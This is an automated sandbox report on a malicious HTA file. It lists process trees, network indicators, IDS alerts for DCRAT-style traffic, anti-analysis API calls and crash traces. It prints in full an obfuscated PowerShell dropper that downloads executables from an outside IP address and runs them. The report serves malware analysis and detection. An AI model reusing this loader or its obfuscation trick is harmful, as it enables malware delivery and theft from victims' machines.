Summary | ZeroBOX

name.hta

Generic Malware task schedule Antivirus ScreenShot Anti_VM AntiDebug PE32 PE File .NET EXE AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 April 27, 2023, 7:41 a.m. April 27, 2023, 7:43 a.m.
Size 105.5KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 1e34ba7ca79958f904b2fcaebe9532e2
SHA256 40f6211b3e50058e11c5d8969d5c0a0bb8ed87c2844cdf7df56cd0b798429655
CRC32 4FF83E56
ssdeep 1536:fxNFOHHtyPqQ9Pt5v90hIZBtUaPIuDOPBK4vV+Gr+e/c5gxhqacgJ:skPxKU4v7/cCH
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\name.hta

    2564
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MnCAu($JwXKrhDlRivPRs, $CSqvRkWsqkA){[IO.File]::WriteAllBytes($JwXKrhDlRivPRs, $CSqvRkWsqkA)};function XszcGdVlHyMMWW($JwXKrhDlRivPRs){if($JwXKrhDlRivPRs.EndsWith((ZSExtBzusbrVsk @(76638,76692,76700,76700))) -eq $True){Start-Process (ZSExtBzusbrVsk @(76706,76709,76702,76692,76700,76700,76643,76642,76638,76693,76712,76693)) $JwXKrhDlRivPRs}else{Start-Process $JwXKrhDlRivPRs}};function QXRFnJUoDIK($EZeJuqGUYsRSuxjBdAY){$lklkVjgHYMCkOvnobVk = New-Object (ZSExtBzusbrVsk @(76670,76693,76708,76638,76679,76693,76690,76659,76700,76697,76693,76702,76708));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CSqvRkWsqkA = $lklkVjgHYMCkOvnobVk.DownloadData($EZeJuqGUYsRSuxjBdAY);return $CSqvRkWsqkA};function ZSExtBzusbrVsk($ylkB){$TsyEWI=76592;$EIrofWZToIZNi=$Null;foreach($hHVHDWGIHgsCmBjRs in $ylkB){$EIrofWZToIZNi+=[char]($hHVHDWGIHgsCmBjRs-$TsyEWI)};return $EIrofWZToIZNi};function XeKyUELvjZOVnMLkCD(){$txkviPAwby = $env:AppData + '\';$eZbyJ = $txkviPAwby + 'host1.exe'; if (Test-Path -Path $eZbyJ){XszcGdVlHyMMWW $eZbyJ;}Else{ $mEkrPEVUnvHtBs = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76696,76703,76707,76708,76641,76638,76693,76712,76693));MnCAu $eZbyJ $mEkrPEVUnvHtBs;XszcGdVlHyMMWW $eZbyJ;}$PXnzJ = $txkviPAwby + 'system32.exe'; if (Test-Path -Path $PXnzJ){XszcGdVlHyMMWW $PXnzJ;}Else{ $gpdHJmGBeHRamC = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76707,76713,76707,76708,76693,76701,76643,76642,76638,76693,76712,76693));MnCAu $PXnzJ $gpdHJmGBeHRamC;XszcGdVlHyMMWW $PXnzJ;};$oaxCdtTRdtQjSGzhkBM = $txkviPAwby + '123.txt';If(Test-Path -Path $oaxCdtTRdtQjSGzhkBM){Invoke-Item $oaxCdtTRdtQjSGzhkBM;}Else{ $OcHRVIXAgnJxIm = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76641,76642,76643,76638,76708,76712,76708));MnCAu $oaxCdtTRdtQjSGzhkBM $OcHRVIXAgnJxIm;Invoke-Item $oaxCdtTRdtQjSGzhkBM;};;;;}XeKyUELvjZOVnMLkCD;" uac

      2688

Name Response Post-Analysis Lookup
pastebin.com 104.20.67.143
IP Address Status Action
104.20.67.143 Active Moloch
164.124.101.2 Active Moloch
45.67.228.48 Active Moloch
94.131.112.154 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49165 -> 45.67.228.48:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 45.67.228.48:80 -> 192.168.56.101:49165 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.67.228.48:80 -> 192.168.56.101:49165 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.67.228.48:80 -> 192.168.56.101:49165 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 45.67.228.48:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 45.67.228.48:80 -> 192.168.56.101:49168 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.67.228.48:80 -> 192.168.56.101:49168 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.67.228.48:80 -> 192.168.56.101:49168 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 104.20.67.143:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49177 -> 94.131.112.154:80 2034194 ET MALWARE DCRAT Activity (GET) A Network Trojan was detected
TCP 192.168.56.101:49177 -> 94.131.112.154:80 2035367 ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.101:49176
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 73:48:5b:25:de:05:30:ba:9f:20:ba:6f:57:3d:cb:35:e9:86:ab:a8

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:590
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function MnCAu($JwXKrhDlRivPRs, $CSqvRkWsqkA){[IO.File]::WriteAllBytes($JwXKr
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: hDlRivPRs, $CSqvRkWsqkA)};function XszcGdVlHyMMWW($JwXKrhDlRivPRs){if($JwXKrhDl
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: RivPRs.EndsWith((ZSExtBzusbrVsk @(76638,76692,76700,76700))) -eq $True){Start-P
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: rocess (ZSExtBzusbrVsk @(76706,76709,76702,76692,76700,76700,76643,76642,76638,
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: 76693,76712,76693)) $JwXKrhDlRivPRs}else{Start-Process $JwXKrhDlRivPRs}};functi
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: on QXRFnJUoDIK($EZeJuqGUYsRSuxjBdAY){$lklkVjgHYMCkOvnobVk = New-Object (ZSExtBz
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: usbrVsk @(76670,76693,76708,76638,76679,76693,76690,76659,76700,76697,76693,767
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: 02,76708));[Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityPro
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: tocolType]::TLS12;$CSqvRkWsqkA = $lklkVjgHYMCkOvnobVk.DownloadData($EZeJuqGUYsR
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: SuxjBdAY);return $CSqvRkWsqkA};function ZSExtBzusbrVsk($ylkB){$TsyEWI=76592;$EI
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: rofWZToIZNi=$Null;foreach($hHVHDWGIHgsCmBjRs in $ylkB){$EIrofWZToIZNi+=[char]($
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: hHVHDWGIHgsCmBjRs-$TsyEWI)};return $EIrofWZToIZNi};function XeKyUELvjZOVnMLkCD(
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: ){$txkviPAwby = $env:AppData + '\';$eZbyJ = $txkviPAwby + 'host1.exe'; if (Test
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: -Path -Path $eZbyJ){XszcGdVlHyMMWW $eZbyJ;}Else{ $mEkrPEVUnvHtBs = QXRFnJUoDIK
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,7
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: 708,76641,76638,76693,76712,76693));MnCAu $eZbyJ $mEkrPEVUnvHtBs;XszcGdVlHyMMWW
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: $eZbyJ;}$PXnzJ = $txkviPAwby + 'system32.exe'; if (Test-Path -Path $PXnzJ){Xsz
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: cGdVlHyMMWW $PXnzJ;}Else{ $gpdHJmGBeHRamC = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: 6642,76638,76693,76712,76693));MnCAu $PXnzJ $gpdHJmGBeHRamC;XszcGdVlHyMMWW $PXn
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: zJ;};$oaxCdtTRdtQjSGzhkBM = $txkviPAwby + '123.txt';If(Test-Path -Path $oaxCdtT
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: RdtQjSGzhkBM){Invoke-Item $oaxCdtTRdtQjSGzhkBM;}Else{ $OcHRVIXAgnJxIm = QXRFnJU
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: oDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: 43,76638,76708,76712,76708));MnCAu $oaxCdtTRdtQjSGzhkBM $OcHRVIXAgnJxIm;Invoke-
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: Item $oaxCdtTRdtQjSGzhkBM;};;;;}XeKyUELvjZOVnMLkCD; uac
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x000001af
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:590
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function MnCAu($JwXKrhDlRivPRs, $CSqvRkWsqkA){[IO.File]::WriteAllBytes($JwXKr
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: hDlRivPRs, $CSqvRkWsqkA)};function XszcGdVlHyMMWW($JwXKrhDlRivPRs){if($JwXKrhDl
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: RivPRs.EndsWith((ZSExtBzusbrVsk @(76638,76692,76700,76700))) -eq $True){Start-P
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: rocess (ZSExtBzusbrVsk @(76706,76709,76702,76692,76700,76700,76643,76642,76638,
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: 76693,76712,76693)) $JwXKrhDlRivPRs}else{Start-Process $JwXKrhDlRivPRs}};functi
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: on QXRFnJUoDIK($EZeJuqGUYsRSuxjBdAY){$lklkVjgHYMCkOvnobVk = New-Object (ZSExtBz
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: usbrVsk @(76670,76693,76708,76638,76679,76693,76690,76659,76700,76697,76693,767
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: 02,76708));[Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityPro
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: tocolType]::TLS12;$CSqvRkWsqkA = $lklkVjgHYMCkOvnobVk.DownloadData($EZeJuqGUYsR
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: SuxjBdAY);return $CSqvRkWsqkA};function ZSExtBzusbrVsk($ylkB){$TsyEWI=76592;$EI
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: rofWZToIZNi=$Null;foreach($hHVHDWGIHgsCmBjRs in $ylkB){$EIrofWZToIZNi+=[char]($
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: hHVHDWGIHgsCmBjRs-$TsyEWI)};return $EIrofWZToIZNi};function XeKyUELvjZOVnMLkCD(
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: ){$txkviPAwby = $env:AppData + '\';$eZbyJ = $txkviPAwby + 'host1.exe'; if (Test
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: -Path -Path $eZbyJ){XszcGdVlHyMMWW $eZbyJ;}Else{ $mEkrPEVUnvHtBs = QXRFnJUoDIK
console_handle: 0x000000fb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654000
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00653fc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00653fc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00653fc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00653bc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654580
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654840
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654840
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654840
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654840
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654840
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654840
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654840
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654840
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006548c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006548c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006548c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006548c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 42 e0 fe ff c3 e9 21 81 fd ff 8b 5c 24 0c
exception.symbol: host1+0x55549c
exception.instruction: in eax, dx
exception.module: host1.exe
exception.exception_code: 0xc0000096
exception.offset: 5592220
exception.address: 0x175549c
registers.esp: 4388760
registers.edi: 21674286
registers.eax: 1750617430
registers.ebp: 19767296
registers.edx: 5593174
registers.ebx: 0
registers.esi: 13
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 6a e4 fe ff e0 dd b2 c3 55 48 c5 8a c0 0a
exception.symbol: host1+0x545af0
exception.instruction: in eax, dx
exception.module: host1.exe
exception.exception_code: 0xc0000096
exception.offset: 5528304
exception.address: 0x1745af0
registers.esp: 4388760
registers.edi: 21674286
registers.eax: 1447909480
registers.ebp: 19767296
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 13
registers.ecx: 10
1 0 0

__exception__

stacktrace:
0xd25523
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca

exception.instruction_r: 39 09 e8 a0 63 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a791
registers.esp: 86502916
registers.edi: 86502980
registers.eax: 0
registers.ebp: 86502988
registers.edx: 44387132
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25523
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
